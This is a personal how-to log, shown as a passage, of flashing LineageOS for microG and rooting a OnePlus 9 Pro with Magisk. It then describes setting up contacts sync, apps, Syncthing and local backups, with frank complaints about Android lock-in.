(bootloader) is-logical:DRIVER:no
(bootloader) is-logical:dsp_a:no
(bootloader) is-logical:dsp_b:no
(bootloader) is-logical:dtbo_a:no
(bootloader) is-logical:dtbo_b:no
(bootloader) is-logical:engineering_cdt_a:no
(bootloader) is-logical:engineering_cdt_b:no
(bootloader) is-logical:featenabler_a:no
(bootloader) is-logical:featenabler_b:no
(bootloader) is-logical:frp:no
(bootloader) is-logical:fsc:no
(bootloader) is-logical:fsg:no
(bootloader) is-logical:hyp_a:no
(bootloader) is-logical:hyp_b:no
(bootloader) is-logical:hyp_log:no
(bootloader) is-logical:imagefv_a:no
(bootloader) is-logical:imagefv_b:no
(bootloader) is-logical:kernel_log:no
(bootloader) is-logical:keymaster_a:no
(bootloader) is-logical:keymaster_b:no
(bootloader) is-logical:keystore:no
(bootloader) is-logical:limits-cdsp:no
(bootloader) is-logical:limits:no
(bootloader) is-logical:logdump:no
(bootloader) is-logical:logfs:no
(bootloader) is-logical:mdcompress:no
(bootloader) is-logical:mdtp_a:no
(bootloader) is-logical:mdtp_b:no
(bootloader) is-logical:mdtpsecapp_a:no
(bootloader) is-logical:mdtpsecapp_b:no
(bootloader) is-logical:metadata:no
(bootloader) is-logical:misc:no
(bootloader) is-logical:modem_a:no
(bootloader) is-logical:modem_b:no
(bootloader) is-logical:modemdump:no
(bootloader) is-logical:modemst1:no
(bootloader) is-logical:modemst2:no
(bootloader) is-logical:multiimgoem_a:no
(bootloader) is-logical:multiimgoem_b:no
(bootloader) is-logical:ocdt:no
(bootloader) is-logical:odm_b-cow:yes
(bootloader) is-logical:odm_b:yes
(bootloader) is-logical:oplusdycnvbk:no
(bootloader) is-logical:opluslog:no
(bootloader) is-logical:oplusreserve1:no
(bootloader) is-logical:oplusreserve2:no
(bootloader) is-logical:oplusreserve3:no
(bootloader) is-logical:oplusreserve4:no
(bootloader) is-logical:oplusreserve5:no
(bootloader) is-logical:oplus_sec_a:no
(bootloader) is-logical:oplus_sec_b:no
(bootloader) is-logical:oplusstanvbk_a:no
(bootloader) is-logical:oplusstanvbk_b:no
(bootloader) is-logical:param:no
(bootloader) is-logical:persist_bkp:no
(bootloader) is-logical:persist:no
(bootloader) is-logical:product_b-cow:yes
(bootloader) is-logical:product_b:yes
(bootloader) is-logical:qmcs:no
(bootloader) is-logical:qsee_log:no
(bootloader) is-logical:qupfw_a:no
(bootloader) is-logical:qupfw_b:no
(bootloader) is-logical:qweslicstore_a:no
(bootloader) is-logical:qweslicstore_b:no
(bootloader) is-logical:rawdump:no
(bootloader) is-logical:rtice:no
(bootloader) is-logical:sda:no
(bootloader) is-logical:sdb:no
(bootloader) is-logical:sdc:no
(bootloader) is-logical:sdd:no
(bootloader) is-logical:sde:no
(bootloader) is-logical:sdf:no
(bootloader) is-logical:secdata:no
(bootloader) is-logical:shrm_a:no
(bootloader) is-logical:shrm_b:no
(bootloader) is-logical:splash_a:no
(bootloader) is-logical:splash_b:no
(bootloader) is-logical:spunvm:no
(bootloader) is-logical:ssd:no
(bootloader) is-logical:storsec:no
(bootloader) is-logical:super:no
(bootloader) is-logical:system_b-cow:yes
(bootloader) is-logical:system_b:yes
(bootloader) is-logical:system_ext_b-cow:yes
(bootloader) is-logical:system_ext_b:yes
(bootloader) is-logical:tz_a:no
(bootloader) is-logical:tz_b:no
(bootloader) is-logical:tzsc:no
(bootloader) is-logical:uefisecapp_a:no
(bootloader) is-logical:uefisecapp_b:no
(bootloader) is-logical:uefivarstore:no
(bootloader) is-logical:userdata:no
(bootloader) is-logical:vbmeta_a:no
(bootloader) is-logical:vbmeta_b:no
(bootloader) is-logical:vbmeta_system_a:no
(bootloader) is-logical:vbmeta_system_b:no
(bootloader) is-logical:vbmeta_vendor_a:no
(bootloader) is-logical:vbmeta_vendor_b:no
(bootloader) is-logical:vendor_b-cow:yes
(bootloader) is-logical:vendor_boot_a:no
(bootloader) is-logical:vendor_boot_b:no
(bootloader) is-logical:vendor_b:yes
(bootloader) is-logical:vm-bootsys_a:no
(bootloader) is-logical:vm-bootsys_b:no
(bootloader) is-logical:vm-data:no
(bootloader) is-logical:xbl_a:no
(bootloader) is-logical:xbl_b:no
(bootloader) is-logical:xbl_config_a:no
(bootloader) is-logical:xbl_config_b:no
(bootloader) is-userspace:yes
(bootloader) max-download-size:0x10000000
(bootloader) partition-size:abl_a:0x800000
(bootloader) partition-size:abl_b:0x800000
(bootloader) partition-size:abl_log:0xFD0000
(bootloader) partition-size:ALIGN_TO_128K_1:0x1A000
(bootloader) partition-size:ALIGN_TO_128K_2:0x1A000
(bootloader) partition-size:android_log:0xFD0000
(bootloader) partition-size:aop_a:0x80000
(bootloader) partition-size:aop_b:0x80000
(bootloader) partition-size:apdp:0x40000
(bootloader) partition-size:apdp_full:0x40000
(bootloader) partition-size:bluetooth_a:0x200000
(bootloader) partition-size:bluetooth_b:0x200000
(bootloader) partition-size:boot_a:0xC000000
(bootloader) partition-size:boot_b:0xC000000
(bootloader) partition-size:carrier:0x4000000
(bootloader) partition-size:cdt:0x20000
(bootloader) partition-size:connsec:0x20000
(bootloader) partition-size:cpucp_a:0x100000
(bootloader) partition-size:cpucp_b:0x100000
(bootloader) partition-size:ddr:0x100000
(bootloader) partition-size:devcfg_a:0x20000
(bootloader) partition-size:devcfg_b:0x20000
(bootloader) partition-size:devinfo:0x1000
(bootloader) partition-size:dinfo:0x4000
(bootloader) partition-size:dip:0x100000
(bootloader) partition-size:DRIVER:0x2000000
(bootloader) partition-size:dsp_a:0x4000000
(bootloader) partition-size:dsp_b:0x4000000
(bootloader) partition-size:dtbo_a:0x1800000
(bootloader) partition-size:dtbo_b:0x1800000
(bootloader) partition-size:engineering_cdt_a:0x100000
(bootloader) partition-size:engineering_cdt_b:0x100000
(bootloader) partition-size:featenabler_a:0x20000
(bootloader) partition-size:featenabler_b:0x20000
(bootloader) partition-size:frp:0x80000
(bootloader) partition-size:fsc:0x20000
(bootloader) partition-size:fsg:0x300000
(bootloader) partition-size:hyp_a:0x800000
(bootloader) partition-size:hyp_b:0x800000
(bootloader) partition-size:hyp_log:0xFD0000
(bootloader) partition-size:imagefv_a:0x200000
(bootloader) partition-size:imagefv_b:0x200000
(bootloader) partition-size:kernel_log:0xFD0000
(bootloader) partition-size:keymaster_a:0x80000
(bootloader) partition-size:keymaster_b:0x80000
(bootloader) partition-size:keystore:0x80000
(bootloader) partition-size:limits:0x1000
(bootloader) partition-size:limits-cdsp:0x1000
(bootloader) partition-size:logdump:0x4000000
(bootloader) partition-size:logfs:0x800000
(bootloader) partition-size:mdcompress:0x1400000
(bootloader) partition-size:mdtp_a:0x2000000
(bootloader) partition-size:mdtp_b:0x2000000
(bootloader) partition-size:mdtpsecapp_a:0x400000
(bootloader) partition-size:mdtpsecapp_b:0x400000
(bootloader) partition-size:metadata:0x1000000
(bootloader) partition-size:misc:0x100000
(bootloader) partition-size:modem_a:0x14A00000
(bootloader) partition-size:modem_b:0x14A00000
(bootloader) partition-size:modemdump:0x12C00000
(bootloader) partition-size:modemst1:0x300000
(bootloader) partition-size:modemst2:0x300000
(bootloader) partition-size:multiimgoem_a:0x8000
(bootloader) partition-size:multiimgoem_b:0x8000
(bootloader) partition-size:ocdt:0x20000
(bootloader) partition-size:odm_b:0x2BD000
(bootloader) partition-size:odm_b-cow:0x2C1000
(bootloader) partition-size:oplusdycnvbk:0xA00000
(bootloader) partition-size:opluslog:0x10000000
(bootloader) partition-size:oplusreserve1:0x800000
(bootloader) partition-size:oplusreserve2:0x10000000
(bootloader) partition-size:oplusreserve3:0x4000000
(bootloader) partition-size:oplusreserve4:0x2000000
(bootloader) partition-size:oplusreserve5:0x4000000
(bootloader) partition-size:oplus_sec_a:0xA00000
(bootloader) partition-size:oplus_sec_b:0xA00000
(bootloader) partition-size:oplusstanvbk_a:0xA00000
(bootloader) partition-size:oplusstanvbk_b:0xA00000
(bootloader) partition-size:param:0x800000
(bootloader) partition-size:persist:0x2000000
(bootloader) partition-size:persist_bkp:0x2000000
(bootloader) partition-size:product_b:0x1652F000
(bootloader) partition-size:product_b-cow:0x16696000
(bootloader) partition-size:qmcs:0x1E00000
(bootloader) partition-size:qsee_log:0xFD0000
(bootloader) partition-size:qupfw_a:0x14000
(bootloader) partition-size:qupfw_b:0x14000
(bootloader) partition-size:qweslicstore_a:0x40000
(bootloader) partition-size:qweslicstore_b:0x40000
(bootloader) partition-size:rawdump:0x8000000
(bootloader) partition-size:rtice:0x80000
(bootloader) partition-size:sda:0x3A10800000
(bootloader) partition-size:sdb:0x800000
(bootloader) partition-size:sdc:0x800000
(bootloader) partition-size:sdd:0x2000000
(bootloader) partition-size:sde:0x180000000
(bootloader) partition-size:sdf:0x2000000
(bootloader) partition-size:secdata:0x7000
(bootloader) partition-size:shrm_a:0x20000
(bootloader) partition-size:shrm_b:0x20000
(bootloader) partition-size:splash_a:0x20A4000
(bootloader) partition-size:splash_b:0x20A4000
(bootloader) partition-size:spunvm:0x2000000
(bootloader) partition-size:ssd:0x2000
(bootloader) partition-size:storsec:0x20000
(bootloader) partition-size:super:0x29B000000
(bootloader) partition-size:system_b:0x406A4000
(bootloader) partition-size:system_b-cow:0x40AAC000
(bootloader) partition-size:system_ext_b:0xDF3A000
(bootloader) partition-size:system_ext_b-cow:0xE01B000
(bootloader) partition-size:tz_a:0x400000
(bootloader) partition-size:tz_b:0x400000
(bootloader) partition-size:tzsc:0x20000
(bootloader) partition-size:uefisecapp_a:0x200000
(bootloader) partition-size:uefisecapp_b:0x200000
(bootloader) partition-size:uefivarstore:0x80000
(bootloader) partition-size:userdata:0x3751FB3000
(bootloader) partition-size:vbmeta_a:0x10000
(bootloader) partition-size:vbmeta_b:0x10000
(bootloader) partition-size:vbmeta_system_a:0x10000
(bootloader) partition-size:vbmeta_system_b:0x10000
(bootloader) partition-size:vbmeta_vendor_a:0x10000
(bootloader) partition-size:vbmeta_vendor_b:0x10000
(bootloader) partition-size:vendor_b:0x50520000
(bootloader) partition-size:vendor_b-cow:0x50A27000
(bootloader) partition-size:vendor_boot_a:0xC000000
(bootloader) partition-size:vendor_boot_b:0xC000000
(bootloader) partition-size:vm-bootsys_a:0x10625000
(bootloader) partition-size:vm-bootsys_b:0x10625000
(bootloader) partition-size:vm-data:0x20A4000
(bootloader) partition-size:xbl_a:0x600000
(bootloader) partition-size:xbl_b:0x600000
(bootloader) partition-size:xbl_config_a:0x80000
(bootloader) partition-size:xbl_config_b:0x80000
(bootloader) product:OnePlus9Pro
(bootloader) secure:yes
(bootloader) security-patch-level:2021-12-05
(bootloader) serialno:XXXXXXX
(bootloader) slot-count:2
(bootloader) snapshot-update-status:snapshotted
(bootloader) super-partition-name:super
(bootloader) system-fingerprint:OnePlus/OnePlus9Pro_EEA/OnePlus9Pro:11/RKQ1.201105.002/2111112053:user/release-keys
(bootloader) treble-enabled:true
(bootloader) unlocked:yes
(bootloader) vendor-fingerprint:OnePlus/OnePlus9Pro_EEA/OnePlus9Pro:11/RKQ1.201105.002/2111112053:user/release-keys
(bootloader) version:0.4
(bootloader) version-baseband:
(bootloader) version-bootloader:unknown
(bootloader) version-os:11
(bootloader) version-vndk:30
Finished. Total time: 1.181s
```
Fuck. Again. ... TBC. AGAIN. how many more yaks are left to shave one wonders.
todo:
* skip all the guided setup steps
* open the microG app
* run the self check
* magisk root if needed
* everything else
### config
* settings
* sound
* advanced
* screen locking sound - off
* touch sounds - off
* system
* advanced
* gestures
* power menu
* advanced restart - on
### Lineage+microG+Magisk again - success!
Let's try downloading the latest and flashing again.
<https://download.lineage.microg.org/lemonadep/?sort=time&order=asc>
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ ll lineage-18.1-2022040*
-rw-rw-r-- 1 tim tim 192M Apr 30 20:38 lineage-18.1-20220401-microG-lemonadep-recovery.img
-rw-rw-r-- 1 tim tim 1.1G Apr 30 20:39 lineage-18.1-20220405-microG-lemonadep.zip
-rw-rw-r-- 1 tim tim 3.9K Apr 30 20:37 lineage-18.1-20220405-microG-lemonadep.zip.prop
-rw-rw-r-- 1 tim tim 109 Apr 30 20:37 lineage-18.1-20220405-microG-lemonadep.zip.sha256sum
$ sha256sum -c lineage-18.1-20220405-microG-lemonadep.zip.sha256sum
lineage-18.1-20220405-microG-lemonadep.zip: OK
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ cd update_verifier-master
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/update_verifier-master
$ python update_verifier.py lineageos4microg_pubkey ../lineage-18.1-20220405-microG-lemonadep.zip
verified successfully
```
We'll do a swap slot again so that it won't overwrite the currently working lineage install.
Vol-down + power button to enter recovery (from powered off).
Lineage recovery says "Active slot: b" at the top. Let's boot it, check what we have, swap, boot again to see the other...
* slot b: broken install - drops to bootloader
* slot a: also broken ...., erm I swear I booted that. wtf. phones.
so that means I should swap slot so that "a" is active, so that fastboot flashes over the broken "b" and then swaps to it without touching the currently working "a" slot.
Use lineage bootloader to format the system just to see if that fixes the broken install. .... Nope. Both slots still fubar.
Right, well, flashing time either way.
put phone into recovery "update > apply from adb" mode
`adb sideload lineage-18.1-20220405-microG-lemonadep.zip`
long pause...
back > reboot system
hurrah, a lineage boot animation
rattle through setup steps again, did wifi, nothing else
todo: fingerprint and pin
todo: re-root with magisk before doing anything else
new things compared to plain lineage: f-droid & microG apps
installed andOTP & vespucci (OSM editor) from f-droid
---
enable developer options (system > about phone, tap lots of times)
system > advanced > developer options > usb debugging ON + Disable adb authorisation timeout (so that if my screen fails or the software misbehaves I can get my files over a usb cable)
Install Magisk by John Wu via F-Droid instead of adb this time
Extract the updated payload:
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ cd payload
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ ../../payload-dumper-go/payload-dumper-go_1.2.0_linux_amd64/payload-dumper-go ../lineage-18.1-20220405-microG-lemonadep.zip
Please wait while extracting payload.bin from the archive.
payload.bin: /tmp/payload_208101762.bin
Payload Version: 2
Payload Manifest Length: 94295
Payload Manifest Signature Length: 267
Found partitions:
boot (201 MB), dtbo (25 MB), odm (2.9 MB), product (378 MB), system (1.1 GB), system_ext (234 MB), vbmeta (8.2 kB), vbmeta_system (4.1 kB), vendor (1.3 GB), vendor_boot (201 MB)
Number of workers: 4
odm (2.9 MB) [==============================================================================================] 100 %
boot (201 MB) [==============================================================================================] 100 %
dtbo (25 MB) [==============================================================================================] 100 %
product (378 MB) [==============================================================================================] 100 %
system (1.1 GB) [==============================================================================================] 100 %
system_ext (234 MB) [==============================================================================================] 100 %
vbmeta (8.2 kB) [==============================================================================================] 100 %
vbmeta_system (4.1 kB) [==============================================================================================] 100 %
vendor (1.3 GB) [==============================================================================================] 100 %
vendor_boot (201 MB) [==============================================================================================] 100 %
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ ll
total 4.0K
drwxr-xr-x 2 tim tim 4.0K Apr 30 21:34 extracted_20220430_213414
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ ll extracted_20220430_213414
total 3.3G
-rwxr-xr-x 1 tim tim 192M Apr 30 21:34 boot.img
-rwxr-xr-x 1 tim tim 24M Apr 30 21:34 dtbo.img
-rwxr-xr-x 1 tim tim 2.8M Apr 30 21:34 odm.img
-rwxr-xr-x 1 tim tim 361M Apr 30 21:34 product.img
-rwxr-xr-x 1 tim tim 224M Apr 30 21:34 system_ext.img
-rwxr-xr-x 1 tim tim 1.1G Apr 30 21:34 system.img
-rwxr-xr-x 1 tim tim 8.0K Apr 30 21:34 vbmeta.img
-rwxr-xr-x 1 tim tim 4.0K Apr 30 21:34 vbmeta_system.img
-rwxr-xr-x 1 tim tim 192M Apr 30 21:34 vendor_boot.img
-rwxr-xr-x 1 tim tim 1.3G Apr 30 21:35 vendor.img
```
send to phone:
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ adb push extracted_20220430_213414/boot.img /sdcard/Download/
extracted_20220430_213414/boot.img: 1 file pushed, 0 skipped. 192.7 MB/s (201326592 bytes in 0.996s)
```
run the patch in the phone Magisk UI (under “install”)
get the patched file back:
```
im@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ patched=`adb shell ls /sdcard/Download/magisk_patched*`
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ adb pull $patched
/sdcard/Download/magisk_patched-24300_v4xhs.img: 1 file pulled, 0 skipped. 34.7 MB/s (201326592 bytes in 5.532s)
```
turn on advanced reboot again in settings
reboot to fastboot
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ fastboot flash boot magisk_patched-24300_v4xhs.img
Sending 'boot_a' (196608 KB) OKAY [ 6.597s]
Writing 'boot_a' OKAY [ 0.611s]
Finished. Total time: 7.387s
```
"reboot now"
success. open up magisk, shows as installed (v24.3)
## F-Droid app list
### Turn On Install history
Before starting installations do this so that we (might) have an exportable record to share.
Turn on install history before starting so that we can export at the end - <https://gitlab.com/fdroid/fdroidclient/-/issues/70#note_89110104>
Settings > Expert mode > Keep install history
### Export list when done
Settings > Install history and metrics > Share (share icon with 3 linked dots at top) > fail, no apps that know what to do with the file installed yet. gah.
### Google contacts, calendar & gmail - fail
via aurora
Install contacts...
- Sign in
- Goes to microG
- Then to official google sign in
- Sign in succeeds
- Acc now listed in settings > accounts
- google contacts still shows no accounts & no contacts. Damn
- tap acc, tap any of the settings (all go to same place) turn on "Allow apps to find contacts"
- now google contacts shows the account, but still doesn't sync.
Hrmm. Need this or equivalent obviously. Switching will be non trivial.
Same problem for gmail.
Calendar app works and has all events, desktop widget broken (shows no events)
#### Research
##### Alternatives
* <https://alternativeto.net/software/google-contacts/>
* <https://www.reddit.com/r/LineageOS/comments/7wnwpe/alternative_to_google_calender_or_contacts_sync/>
* <https://www.reddit.com/r/LineageOS/comments/8qv3p3/alternative_services_to_google_calendar_and/>
* <https://www.reddit.com/r/LineageOS/comments/pt5ce7/are_the_contacts_and_telephone_apps_built_by/>
* <https://f-droid.org/en/packages/com.simplemobiletools.contacts.pro/>
* <https://f-droid.org/en/packages/com.simplemobiletools.contacts.pro/>
##### Making it work
* <https://github.com/microg/GmsCore/issues/585>
* <https://github.com/tomwiggers/Magisk-ConCal-Sync-MicroG>
* [download Magisk-ConCal-Sync-MicroG repo zip](https://github.com/tomwiggers/Magisk-ConCal-Sync-MicroG/archive/refs/heads/master.zip)
* extract, go into inner folder and zip up the four items
* copy to phone with syncthing
* magisk > modules > install from storage > select the zip > done
* reboot phone
* boot loop. FUUUUUUUUCK
* reported issue for what it's worth, including `logcat` logs: <https://github.com/tomwiggers/Magisk-ConCal-Sync-MicroG/issues/3>
* remove modules
* <https://www.thecustomdroid.com/uninstall-magisk-modules-in-twrp-recovery-guide/>
* connect phone usb
* run `adb wait-for-device shell magisk --remove-modules` on laptop
* boot up phone normally
* phone booted into lock screen, phew!
#### Calendar
bearable, widget broken but app itself works and syncs
have to manually turn on sync for additional calendars
#### Contacts
Need alternative, perhaps fastmail
* Let's try fastmail's contacts...
* [google contacts web app](https://contacts.google.com/) > export from google contacts > vCard
* [fastmail web app > dropdown thing > settings](https://www.fastmail.com/settings/setup/importexport) > import > contacts > upload addressbook file > choose the vcf
* imported all but two, showed me the errors, not ones I care about.
* check fastmail phone app, contacts come flooding in.
* but no sign of them in the main phone contacts app. damn.
* <https://www.reddit.com/r/fastmail/comments/f2akqj/dealing_with_contacts/>
I've messaged fastmail support to ask them why they have a completely separate contact section in the fastmail app rather than using the shared contacts store in Android/LineageOS.
Because I'm short of good options I will reluctantly try the DAVx app that everyone points to. I really don't want yet another sync involved in the whole thing but I also don't want to run and maintain a NextCloud install (which lots of people suggest).
* Installing DAVx5
* It's listed in Aurora (the play store proxy) and shows "£4.29" instead of the usual "Install".
* Pressed money button to see what happens > error "Download failed, app not purchased". Cool.
* Go to [DAVx5 on play store](https://play.google.com/store/apps/details?id=at.bitfire.davdroid) and make the purchase
* concerningly for the future the play store pops an "install to blah device", which is fine now because it knows about my *old* phone, but what if I didn't have the old phone some time, does that mean I could no longer get paid apps and install them with Aurora?
* Back on the new phone Aurora install now works. Win.
* Setting up DAVx5
* rattled through default wizard without changing (or understanding) anything
* interesting warning about oneplus blocking sync that points to <https://www.davx5.com/faq/synchronization-is-not-run-as-expected>
* Create app password in fastmail web interface for DAVx
* Login to DAVx app with email + app-password ... fail, presumably because it's a custom domain
* Use custom base url option - <https://www.davx5.com/tested-with/fastmail>
* Base url: `https://carddav.fastmail.com` + email + app-password .... success
* Create account: account name? (defaults to <EMAIL>) - "Use your email address as account name because Android will use the account name as ORGANIZER field for events you create. You can't have two accounts with the same name." - probably fine, left default
* Contact group method:
* "Groups are separate vCards" - default, left as this
* "Groups are per-contact categories"
* Next
* No contacts sync (missing permissions) > Permissions > All of the below to "on" > grant dialogs
* Shows two unchecked checkboxes, but don't know what they mean
* "Global Address Book"
* "personal"
* Trying out ticking "personal", tick it and press orange sync now button
* woo, main contacts app now full of contacts. sim switch time!!!
#### GMail
todo, probably set up imap and use k9mail + web interface on laptop
### F-Droid app list
* Vespucci (open-streetmap (OSM) editor)
* andOTP (one time password generator with backup/restore capability)
* Aurora play store proxy - configure as per above section
* Syncthing
* OAndBackupX - to replace proprietary (but very good) titanium backup
* Needs root, provided by Magisk. Without root no apps can access the data of other apps. This is the primary reason that root is so important to me. I want a backup system that I can actually trust because it's not some proprietary cloud magic pixie dust, it's instead a straight-forward grab-the-files-and-put-them-somewhere-safe operation that I can inspect and get to without more proprietary black magic.
* [KeepassDX](https://www.keepassdx.com/) - <https://github.com/Kunzisoft/KeePassDX>
* k9mail
* vlc
* markor
* antennapod - todo restore state
* qr & barcode scanner
* aTimeLogger
* [Editor](https://f-droid.org/en/packages/org.billthefarmer.editor/) (replacement for droidedit?)
* [GPSLogger](https://f-droid.org/en/packages/com.mendhak.gpslogger/)
### todo - more apps (f-droid where possible)
* VLC
* AntennaPod
* Audible
* Maverick (for recording and viewing gps traces, could do with a replacement, the map tiles seem to have died and it's getting buggy)
* google home (for chromecast & google mini integration)
* RainAlarm (paid for ad-free)
* Google calendar (or find a non-google replacement)
* Google contacts (or find a non-google replacement)
* Waze
* Google maps (for satnav, route planning and finding local businesses)
* LinkedIn
* Twitter
* Telegram FOSS (a slightly free-er version of telegram)
* ...
### Other f-droid app suggestions
* <https://www.reddit.com/r/fdroid/comments/lzzdbg/a_list_of_some_fdroid_apps_i_installed_to_get_you/>
## Play store app list (via Aurora)
Only things not available in f-droid
* maps.me
* Spotify
* Audible
* Firefox
* google maps - works flawlessly!
* signal messenger
* surprisingly not in f-droid!
* can't be on multiple phones at once, can only "transfer". Grumble.
* banking apps (2/3 work)
* sunsama
* trello
* slack
* rain alarm - todo restore paid version
* zoom
* bulb energy
* YNAB
* Ring (doorbell)
* Google home
* Life360 (shared gps locations for family, saves a bunch of "have you left yet?" text messages)
* Fastmail - not for the mail, prefer k9mail, but to see if it can do contacts as well as goooooooogle
* DroidEdit
* Ringo
* National rail
* Goodreads
* Pluralsight
* LinkedIn
* FreeAgent
* BBC
* Weather
* Sounds
* iPlayer
* Amazon Shopping
* Amazon Prime
* YouTube
* Microsoft authenticator
* Google authenticator
* Bandcamp
* [Offline English Dictionary by Livio](https://play.google.com/store/apps/details?id=livio.pack.lang.en_US)
* Strava
## Built-in apps
### Camera - configure
* Hamburger
* GPS > on
* Touch focus duration > infinite (man that has always annoyed me! Default 3 seconds, why?!)
* shutter sound > disabled
### Browser - disable
Disable (using firefox instead)
### Messaging - disable
Messaging > long press > app info > disable
## Individual app setup
### Syncthing
* Open web gui
* Disable all non-LAN
* Remove default folder (Camera)
* Set device name
* Connect to existing machine(s).
* Add `/storage/emulated/0` folder (can't do this in non-web gui, stupid security warning. Nanny state of android.)
* Warnings about failure to sync `Android/data` and `Android/obb`. Looks like they've tightened up security more, either that or syncthing has better warnings now. These folders will be exposed by OAndBackupX so I can safely ignore this until I sort out the ignore file for syncthing.
Oh no, syncthing can no longer access `/storage/emulated/0/Android/data` - <https://forum.syncthing.net/t/can-i-sync-send-only-data-from-android-data-in-android-11/17898>
Even more reason to have root and run a real and independent backup tool.
#### Syncthing ignore patterns
Set up ignores for caches and things that won't sync. Files for this are on github at <https://github.com/timabell/dotmatrix/tree/master/phone>
* Create file `phone.stignore` in the root of the sync'd sdcard folder. This one you can edit on the laptop as you find more things you don't want sync'd.
* Create file `phonetemplate.stignore` in the root folder and put only this line in it `#include phone.stignore`
* On the phone when they have sync'd copy the `phonetemplate.stignore` to a file named just `.stignore` in the root folder.
The reason for this dance is that syncthing won't sync the `.stignore` so to be able to edit the ignores on a different device you have to set up a link.
### AndOTP
* Set up password
* Turn off global timeout bar (distracting & stressful)
* Icons: small
* Layout: compact
* Copy backup from old phone with syncthing and restore it
### AntennaPod
Now I get to the crux of why I was so fucked off with Android.
I want to copy the *exact* state of antennapod to the new phone; but my old phone de-rooted itself and broke the backups; and you can't back up ~/data where everything lives without root because it's all locked down with per-app-user permissions, which is great for isolating apps from each other ... and you. The only option for those folders is in app sync (e.g.. sign in to trello/firefox/slack etc) so local state is throwaway, or backup to google drive .... to some magical fucking invisible folder so you can't even download the backups it made. This shit makes me so mad.
We already have working systems for backups and security and these fuckers have broken them and replaced them with their own vendor-locked-in proprietary black-box shite that doesn't even work all the time.
Because I'd lost root and usable backups it took me a while to work out how to transfer my latest beloved podcast player state to a new phone. I knew that you could import/export an OPML list of subscriptions but I really wanted to keep the play state of every episode so I could easily scan the back-catalogues for episodes I'd never listened to dotted amongst the many thousands of episodes I have listened to. Well darn it there is a full export feature I didn't know about. It exports to the virtual sdcard storage which is kinda like a home directory that you can actually access as a user. I already have the sdcard storage syncing to my other machines with syncthing so getting it from there onwards is a trivial copy-paste on the laptop.
Here's what a quick ~~google~~ [ddg](https://duckduckgo.com/) showed up:
* <https://github.com/AntennaPod/AntennaPod/issues/5391>
* <https://github.com/AntennaPod/AntennaPod/issues/5031>
* <https://github.com/AntennaPod/AntennaPod/issues/377>
Old phone:
* hamburger menu top left
* settings (cog at bottom) > storage > import/export > database export
* ensure syncthing is running and connected
Laptop:
* Copy file on laptop to new phone's sync folder
New phone:
* make sure syncthing is running, connected and up to date to pull new file in
* hamburger menu top left
* settings (cog at bottom) > storage > import/export > database import > Confirm
* select file
* press ok to restart Antennapod
* Woo! Queue entirely intact!
Downloads have to be re-done for the queue but the UI makes that dead easy, just hit play and it switches to a download button so you can whip through them quick.
### Bulb energy
* App downloaded
* Sign in by magic email link failed
* Sign in with password worked
* Statement download failed with "no apps can perform this action" but can always use website to get them. ... ah, no pdf reading apps installed, installing a random pdf app fixed that. Not a very clear error message that one!
### KeePassDX
Enable fingerprint unlock <https://github.com/Kunzisoft/KeePassDX/wiki/Advanced-Unlocking#b-link-database-credential-to-advanced-unlock-recognition=>
### NeoBackup
* Backup folder > neo-backup folder on emulated sdcard home > use this folder
* Allow access prompt > allow
"i" button top right > interesting note about types of android data and inability to restore apps using hardware key stores such as signal
* work out what apps to back up -- all of them, why guess what I'll need with so much storage available
* actual backups - done
* schedule backups - done, works great
* maybe automate clearing off phone onto laptop/server
* Set backup password
Set scheduled backup:
* 7 days
* 5am
* system apps + user apps
* apk + obb + data + device protected data
* all apps
* enabled
* Start now
### Firefox
3dots > settings > Search > duckduckgo
firefox was active for 6 hours which makes me think it isn't backgrounding properly, perhaps because of media or js on websites.
Firefox icon > long press > App info (i) > Advanced > Battery > Background restriction > Restrict
### Signal
Use transfer account to new phone feature
Enable chat backups to virtual SD: dots > settings > chat. > Chat backups. Set folder and create backup.
Signal popup saying detected issue with play services and establishing own connection. Now have permanent notification.
### GPSLogger
<https://f-droid.org/en/packages/com.mendhak.gpslogger/>
* hamburger
* logging details
* save to folder > give permissions > new folder (+) > `~/gpx`
* New file creation > every time I start
* performance
* Logging interval > 5 secs
So that syncthing can see it. Defaults to inaccessible data folder. Fffffff
Also set to create new track every time.
## A thought on moving apps and data between phones
During the 1000th discussion of phones with my long-suffering better-half I happened to utter a line that I think really captures why this whole nonsense is (probably) worth the effort:
> "Living in the iOS ecosystem with their magical one-tap transfer from old phones to new phones that leave the new phone exactly in the same state as your old phone ... until you realize one day you want to leave the ecosystem, and you have to leave all your data behind in their walled garden." ~ Me
There are several ways of moving data between phones, which provide varying levels of protection against data loss disasters. Disasters that could be local (phone down loo), localized (all devices stolen from house), cloud based (cloud account hacked and wiped), a combination (cloud hacked and devices remote-wiped).
### Copying files directly
Something like syncthing.
Only works for data on virtual sdcard such as photos & downloads.
### Local backup/restore
With OAndBackup, NeoBackup, TitaniumBackup etc.
Needs root.
Can get app's private data out to storage you control.
Can also backup set of installed apps (`.apk`s) which it turns out is actually quite a time saver compared to clicking install in the app store 100+ times.
### Vendor-provided cloud backup
Completely walled-garden solution. No way to get your data off their cloud without restoring to another device they support (i.e. another Android/iOS device).
### 3rd party cloud backup
Something like dropbox.
It seems that the duopoly has deemed this unacceptable so have hobbled these apps from working properly or at all. Dropbox on iOS has been reduced to a glorified photo backup which can't even run in the background.
Personally I think the fact that the duopoly is denying competition is anti-competitive practice the likes of which saw Microsoft get record fines from the EU back in the day. Hopefully the same will happen to Apple & Google to crack this open a bit, but until then we'll have to just shovel digital shit like this blog post to get out from under them.
## File transfer
Easy thanks to syncthing, just move the folders & files on the laptop from sync sdcard folder of the old phone to the one for the new phone. Win.
## Trial TitaniumBackup restore - success
Before my old phone de-rooted itself thanks to a F****g OS update (grrrrr) I did have titanium set up, so I have some rather stale backups from before then. Mostly as an experiment I've installed Titanium on the new phone to see if the restore works. This is the first time I've had two capable and still working phones at the same time to be able to experiment like this.
* Installed TitaniumBackup via Aurora.
* Installed Titanium's "key" app via Aurora.
